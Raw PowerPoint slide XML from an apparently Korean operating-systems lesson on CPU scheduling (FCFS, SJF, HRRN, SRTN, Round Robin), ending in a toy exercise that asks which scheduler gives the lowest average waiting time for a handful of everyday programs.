                </a:solidFill>
              </a:rPr>
              <a:t>Cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>부하 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>부담</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="84" name="직선 연결선 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B7484EE-6B7F-4DE8-8B6A-039F3422A3FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319799" y="2057632"/>
            <a:ext cx="0" cy="6647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화살표: 아래쪽 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BD8A3C7-0A02-4766-952C-7205FDD554D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4228556" y="1606714"/>
            <a:ext cx="182486" cy="36933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4930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nodeType="click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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="84"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="84"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="84"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="34" presetID="45" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="with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fade">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="85"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="85"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="85"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="39" presetID="1" presetClass="entr" presetSubtype="0"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6" grpId="0" animBg="1"/>
      <p:bldP spid="77" grpId="0" animBg="1"/>
      <p:bldP spid="78" grpId="0" animBg="1"/>
      <p:bldP spid="80" grpId="0"/>
      <p:bldP spid="81" grpId="0"/>
      <p:bldP spid="83" grpId="0"/>
      <p:bldP spid="85"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Scheduling Method</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EF3C9541-B1D5-43A4-A135-057889695698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530626" y="2804585"/>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SPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shortest Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1" dirty="0"/>
              <a:t>SJF</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4865565C-4BA0-4BCD-BE50-FDC8463212E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5453550" y="2804585"/>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Burst Time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이 가장 적은 프로세스 부터 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAAEEC30-8D54-401F-9CCA-5B7938A68772}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530626" y="2108573"/>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FCFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>First Come First Served</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A9FFBAF-BC32-42B5-A901-792DE3A08799}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5453550" y="2108573"/>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Arrival Time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이 가장 적은 프로세스 부터 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1705F51-5713-482F-ABEF-C26B136469F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530626" y="4880917"/>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RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Round Robin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A732A1-3872-43D7-B6A1-6E80BF2F6225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5453550" y="4880917"/>
            <a:ext cx="5749805" cy="530025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>순서대로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Time Quantum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>만큼 할당하는 알고리즘</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75A16312-4C47-4214-A13E-7BB6C1BF743F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530626" y="418663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SRTN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shortest Remain Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68C5E6AB-5858-4C96-BAE0-CB3134D1D80E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5453550" y="418663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Remain Time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이 가장 적은 프로세스 부터 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="직선 연결선 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42525E6F-7D28-4DDA-B3BB-C36256F612D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-14973" y="4094858"/>
            <a:ext cx="12192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1EBAE07-8348-4783-B255-B8BDFD18A065}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530626" y="347306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HRRN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Highest Response Ratio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90045C50-D375-4C55-9186-1E0FDBE90E62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5453550" y="347306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Response Ratio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 가장 높은 프로세스 부터 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96726D58-59C0-47F3-BC5A-581A885FDBE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="169261" y="3525954"/>
            <a:ext cx="920665" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>비선점</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F82B3D7-E440-4EDC-8DF5-943DDB749559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275238" y="4303222"/>
            <a:ext cx="693850" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>선점</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="화살표: 위쪽/아래쪽 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B2B61AD-FFA1-4C51-B8FE-903D2BC5C6ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501861" y="3895285"/>
            <a:ext cx="168966" cy="369326"/>
          </a:xfrm>
          <a:prstGeom prst="up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실행 단추: 문서 28">
            <a:hlinkClick r:id="rId4" action="ppaction://hlinkfile"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A70A19CC-AA8D-4AC3-8B74-A820A8A89E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5575465" y="576772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35988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8" grpId="0"/>
      <p:bldP spid="12"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나의 일상이란</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lvl="1">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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>0</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웹서핑</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(chrome.exe) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>4</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en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>1</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주식 계산 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(calc.exe) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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게임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Leage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> of Legend.exe) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>5</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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>6</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공부</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> (powerpoint.exe) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>2</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  </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기다리는건</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 싫다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나에게 맞는 최적의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> Scheduling Method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ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>무얼까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위 프로세스들을 실행했을 때</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스케줄링 방식 중</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Average Waiting Time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이 최소가 되는 스케줄러를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제약 </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잦은 프로세스 바꿈은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은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>를 지치게 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Time Quantum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>은 적어도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
